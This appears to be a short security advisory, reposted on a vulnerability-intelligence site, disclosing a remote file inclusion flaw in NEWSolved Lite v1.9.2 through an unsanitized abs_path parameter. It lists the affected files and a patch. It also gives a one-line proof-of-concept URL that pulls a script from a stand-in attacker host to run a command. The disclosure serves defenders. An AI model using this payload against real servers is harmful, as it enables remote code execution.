Lucene search
NEWSolved Lite v1.9.2 (abs_path) Remote File Inclusion Vulnerabilities
NEWSolved Lite v1.9.2 Remote File Inclusion Vulnerabilitie
Show more
======================================================================
NEWSolved Lite v1.9.2 (abs_path) Remote File Inclusion Vulnerabilities
======================================================================
+--------------------------------------------------------------------
+
+ NEWSolved Lite v1.9.2 (abs_path) Remote File Inclusion
+
+--------------------------------------------------------------------
+
+ Affected Software .: NEWSolved Lite v1.9.2 (maybe above)
+ Class .............: Remote File Inclusion
+ Risk ..............: high (Remote File Execution)
+ Found by ..........: Philipp Niedziela
+
+--------------------------------------------------------------------
+
+ Affected files:
+
+ newsscript_lyt.php
+ newsticker/newsscript_get.php
+ inc/output/news_theme1.php
+ inc/output/news_theme2.php
+ inc/output/news_theme3.php
+
+--------------------------------------------------------------------
+
+ $abs_path is not properly sanitized before being used
+
+--------------------------------------------------------------------
+
+ Solution:
+
+ Download Patch v1.9.3 and replace the files above.
+
+--------------------------------------------------------------------
+
+ PoC:
+
+ http://[target]/inc/output/news_theme1.php?abs_path=http://evilsite.com?cmd=ls
+
+-------------------------[ E O F ]----------------------------------
# 0day.today [2018-04-07] #Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo07 Aug 2006 00:00Current
7.1High risk
Vulners AI Score7.1